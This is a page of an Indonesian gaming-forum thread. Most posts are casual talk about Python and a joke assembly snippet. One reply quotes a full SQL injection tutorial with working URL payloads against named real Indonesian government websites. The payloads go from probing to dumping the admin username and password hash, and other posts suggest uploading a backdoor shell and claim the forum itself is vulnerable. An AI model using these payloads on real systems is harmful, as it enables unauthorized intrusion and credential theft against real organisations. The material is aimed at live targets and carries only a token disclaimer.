Page 3 of 3 FirstFirst 123
Results 31 to 38 of 38
http://idgs.in/195274
  1. #31
    koker123's Avatar
    Join Date
    Jan 2007
    Location
    Somewhere on Earth
    Posts
    838
    Points
    993.90
    Thanks: 1 / 2 / 2

    Default

    hiks...
    pengen nyoba tapi lagi sibuk bgt Y_Y
    btw d spoiler dong om codenya, panjang2 bgt

    oot dikit ya
    eh om bl00d13z python susah gak c programming languagenya ?
    kelebihannya ap d bandingin language yg laennya ?

  2. Hot Ad
  3. #32

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by koker123 View Post
    hiks...
    pengen nyoba tapi lagi sibuk bgt Y_Y
    btw d spoiler dong om codenya, panjang2 bgt

    oot dikit ya
    eh om bl00d13z python susah gak c programming languagenya ?
    kelebihannya ap d bandingin language yg laennya ?
    kelebihan python:
    - free.. ga da yg bayar2 baik interpreterny maupun library/modul tambahanny
    - multiplatform (sm keq java) mo diwindoz, mo di unix, mac, struktur,syntax n header/modul2ny tetep sama.
    - dukung OOP yg pasti
    - mudah dibaca codingny (ga terlalu bnyk ***** bngek)
    - karna sifatnya menggunakan interpreter..python enak dipelajari, process2 coding bisa dikerjakan step demi step (modus interaktifnya ada), ga perlu compile2..
    - kalo dari segi coding :
    a. dlm coding di python ga perlu ada deklarasi tipe data, ga keq C/C++..
    b. di C/C++ bentuk fungsi menggunakan looping bisa bervariatif, dan bnyk cara buat menghasilkan output yg sama,. kalo di python ga,. loopingnya cm ada while (ada sih for tp itu untuk kepentingan listing),. berbeda ama C yg menyediakan while dan for untuk looping.
    c. alokasi memory lebih optimal, karna yg menentukannya engine si python, berbeda dgn C dimana kita harus menentukan sendiri alokasi memorynya(buffer)..makanya banyak exploitasi buffer overflow buat aplikasi2 yg menggunakan C (manusia tdk pernah lupt dari kesalahan coding, khususnya alokasi memory)

    krg lebih itu, liat aja lambang ma namanya (uler python):


    - simpel
    - kuat
    - licin, dan
    - berbahaya..buaya aja remuk dililit python..whaha

    Last edited by bl00d13z; 14-05-09 at 17:16. Reason: ngasih gbr uler ah..wkwkwk

  4. #33

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by chikebum View Post
    *damn script kiddies trying to be l33t =D

    echo "script kiddies" > /dev/null
    Code:
    main()  {
     __asm__("mov  $0x1d,%edx\n\t"
                   "push $0xa\n\t"
                   "push $0x79746972   \n\t"
                   "push $0x75636573   \n\t"
                   "push $0x206c616e   \n\t"
                   "push $0x6f697365   \n\t"
                   "push $0x666f7270   \n\t"
                   "push $0x2061206d   \n\t"
                   "push $0x27691d  \n\t"              
                   "mov  %esp,%ecx\n\t"
                   "mov  $0x1,%ebx\n\t"        
                   "mov  $0x4,%eax\n\t"       
                   "int  $0x80\n\t"                 
                   "mov  %ebx,%ebx\n\t"      
                   "mov  $0x1,%eax\n\t"       
                   "int  $0x80");     
                }

  5. #34
    PeCuNnN's Avatar
    Join Date
    Oct 2006
    Location
    .:[- IndoGamers -]:.
    Posts
    3,608
    Points
    4,396.90
    Thanks: 0 / 42 / 28

    Default

    Quote Originally Posted by bl00d13z View Post
    Code:
    main()  {
     __asm__("mov  $0x1d,%edx\n\t"
                   "push $0xa\n\t"
                   "push $0x79746972   \n\t"
                   "push $0x75636573   \n\t"
                   "push $0x206c616e   \n\t"
                   "push $0x6f697365   \n\t"
                   "push $0x666f7270   \n\t"
                   "push $0x2061206d   \n\t"
                   "push $0x27691d  \n\t"              
                   "mov  %esp,%ecx\n\t"
                   "mov  $0x1,%ebx\n\t"        
                   "mov  $0x4,%eax\n\t"       
                   "int  $0x80\n\t"                 
                   "mov  %ebx,%ebx\n\t"      
                   "mov  $0x1,%eax\n\t"       
                   "int  $0x80");     
                }
    ahahha... lucu aja liat nya

    btw kl gk salah bloodiez anak jasakom ya ? =D
    ARIKANAMI

    RMD_RetroooRTR

  6. #35

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by PeCuNnN View Post
    ahahha... lucu aja liat nya

    btw kl gk salah bloodiez anak jasakom ya ? =D
    kebiasaan kiddie klo memperkenalkan dri bgtu om.. asm inline c kagok drpd bash script..tu script outputny sebuah job yg gw cita2in ^^ ane anak emak kok..hueheu, ya ank js,ank dc, ank echo, ank h4cky0u(tp dah amburadul tuh HU).. ane kacungnya d3hydr8 wkwkwkw
    Last edited by bl00d13z; 15-05-09 at 00:40.

  7. #36
    chikebum's Avatar
    Join Date
    Nov 2006
    Posts
    3,396
    Points
    4,709.22
    Thanks: 13 / 294 / 69

    Default

    assembly =D
    Last edited by chikebum; 15-05-09 at 11:45.

  8. #37
    Seraf12's Avatar
    Join Date
    Feb 2012
    Location
    susu
    Posts
    12
    Points
    89.00
    Thanks: 6 / 0 / 0

    Red face [video] sql injection step by step + upload backdoor with Tamper Data

    ini ane dapet tutor dari om rusuh :mmalu: teknik dan penjelasan sudah lengkap di vidio

    cekidot langsung di sedot, sizenya lumayan gede 90mb tapi apalah arti sebuah bytes :mgirang:

    DOWNLOAD DISINI


    untuk tamper data bisa di install dari sini.

    Semoga bermanfaat

  9. #38

    Join Date
    Jan 2017
    Posts
    127
    Points
    22.20
    Thanks: 1 / 5 / 5

    Default

    Quote Originally Posted by bl00d13z View Post
    dlu ada yg pernah request tutorial jebol2 site, sapa ya? ;p nah ni ane kasih dkit penjelasannya.. gw ambil dr tutor tmn ane di JS brotha p1t4qh ^ ^, tpi gw edit dkit targetnya, webnya jgn diacak2 ya klo dah pada bisa..yg ngacak2 gw acak2 lagi komp lu tar.. di siteny dah gw tanem logger klo da yg berani deface2.. ok kita langsung praktekin :

    target kita adalah web yg memang memiliki vulnerability(baca:celah keamanan) yaitu SQL inject, SQL-i juga ada 2 metoda ada SQL-i biasa ada yg blind SQL-i..vulner di web juga ga hanya SQL-i aja, tapi ada macem2,antara lain : LFI(Local File Inclusion), RFI(Remote File Inclusion), RCE(Remote Command Execuiton), sama XSS (Cross Site Script) bukan CSSjadinya ya..klo ntu ma buat style2 html

    SQL(Structured Query Language): cari di mbah google aja ya klo masih bngung itu apaan..

    ok sblum gw masuk ke langkah2 SQL-i ada beberapa yg perlu diperhatikan dr seorang hacker2 lamers yg kerjanya deface2, mereka bukan mencari target tapi mencari vulner.. coba si hacker yg sering deface2 itu gw sruh jebol situs FBI, gw jamin dia geleng2 karna dia cm tau vulner tertentu, udah pasti site2 FBI keq gtu mana ada vulner SQL-injectnya, karena ini vulner dan teknik lama. meskipun teknik jadul tp hacker2 harus tau teknik ini..
    kalau tadi saya suruh si hacker jebol sebuah site sekarang saya suruh dia jebol site apapun sebanyak mungkin..dan pastinya dia bisa lakuin bermodal vulner yg dia tau tadi(misal SQL-i), jadi sebenarnya ada perbedaan antara hacker lamers yg tidak beretika dan hacker proffesional yg sangat beretika, semakin menakutkan seorang hacker dilihat dari kemampuan ia mengenal vulner dan memanfaatkannya ^ ^

    ok kita bahas vulner legendaris yg satu ini

    Berikut ini akan disajikan langkah demi langkah SQL Injection yang diimplementasikan pada web http://www.bandung.go.id. nah loh...website pemerintah kota bandung booo...disini ternyata ada vulner SQL-i nyaTutorial ini hanya untuk pembelajaran dan pengetahuan (just to share) dan untuk para master yang telah berpengalaman dianjurkan memberikan masukan agar tekniknya menjadi lebih menarik. :mrgreen:

    kunci dari exploitasi ini adalah kesabaran

    Langkah-langkahnya sebagai berikut :
    1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan mengujinya dengan operator logika ( AND ).
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=9'
    Hasil Uji :
    -Halaman akan menampilkan pesan error
    Code:
    Fatal error: Call to a member function RecordCount() on a non-object in /data1/web/public_html/site/download/qry_download_cat.php on line 6
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=1
    http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=6
    Hasil Uji :
    -Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara normal.
    -Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan (tidak berjalan normal), disini pagenya jadi kosong.

    2. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakukan penambahan/increment pada variabel num. Parameternya adalah jika field masih tersedia maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai pada angka 4.
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+order+by+4--
    Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-set komentar terhadap sintaks setelah klausa WHERE. Kebetulan pada contoh kasus kali ini, setelah klausa WHERE terdapat perintah sql yg lain entah itu ORDER atau LIMIT. Untuk itu digunakan parameter komentar agar perintah sql tersebut tidak dijalankan sehingga kita mendapatkan pesan error jika field yang di ORDER tidak tersedia.

    Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukan ORDER BY 1 dan ORDER BY 100 halaman akan tetap menampilkan pesan error. Kalau kejadiannya seperti ini dari mana kita bisa mengetahui jumlah field yang di-select??

    3. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang digunakan adalah UNION+ALL+SELECT+no_field+no_field+....
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,2,3,4--
    Pada contoh kali ini, variabel id kita beri nilai null agar angka-angka yang kita deklarasikan keluar, atau bisa juga menggunakan tanda minus (id=-870). Dari angka-angka yang tercetak pada halaman web, kita akan mengeluarkan informasi dari versi mysql, nama database dan nama user.
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x2B,version(),database(),user()),3,4--
    4. Selanjutnya kita akan mengeluarkan nama-nama tabel dengan perintah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TA BLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_SCHEMA=DATABASE(). Gunakan klausa WHERE TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari database yang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa WHERE tidak perlu Anda gunakan.(catatan=INFORMATION_SCHEMA hanya untuk SQL ver 5 keatas, utk ver 4 query ini tidak akan bisa digunakan
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
    Pada perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) dengan angka 2, jika Anda tidak ingin menampilkan informasi tentang versi mysql, nama database, dan nama user.

    5. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna. Pada website ini nama tabel yang dimaksud adalah tuser. Sintaks dasarnya adalah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO LUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='NAMA_TABLE'. Jika terjadi error maka kita harus meng-konversi nama tabel ke bentuk hexadecimal_sql sehingga menjadi 0x7475736572
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x7475736572--
    6. Langkah terakhir kita akan mengeluarkan record-record dari tabel tuser. struktur perintahnya adalahUNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE. Kalau dijalankan pada contoh kasus kali ini menjadi :
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x3a,userid,pwd),3,4+from+tuser--
    nahh.. keliatan kan username admin ama hash passwordnya.. sisanya tinggal ***** tu hash(decrypt), jenisnya harus tau dlu apakah md4,md5,sha1,dll. kadangkala ada pula yg ga dienkrip,ini fatal banget klo sampe ga dienkrip.

    kalo udah dapet passwd trus ngapain?,ya tgl cari page admin nya..login trus terserah deh mau diapain,. dah jadi super admin ini^^ sory ga gw kasih tau pagenya dmn..just learning

    Sampai disini selesai sudah penyajian penulis mengenai langkah demi langkah SQL Injection pada Web pemerintah kota bandung. saya tidak bertanggung jawab atas segala dampak negatif akibat penyalahgunaan artikel ini.. dan khusus web yg saya ambil sebagai sampel jgn pernah sekali2 coba deface, Mohon dikoreksi jika terdapat kekurangan ataupun kesalahan.

    author1t4qh - jasakom mentor & write and edited by: bl00d13z a.k.a b1n4ry_g33k5/c0mrade - jasakom advisor
    Mending langsung upload shell terus remote database nya.
    Celah ini juga ada di forum.indogamers.com

Page 3 of 3 FirstFirst 123

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •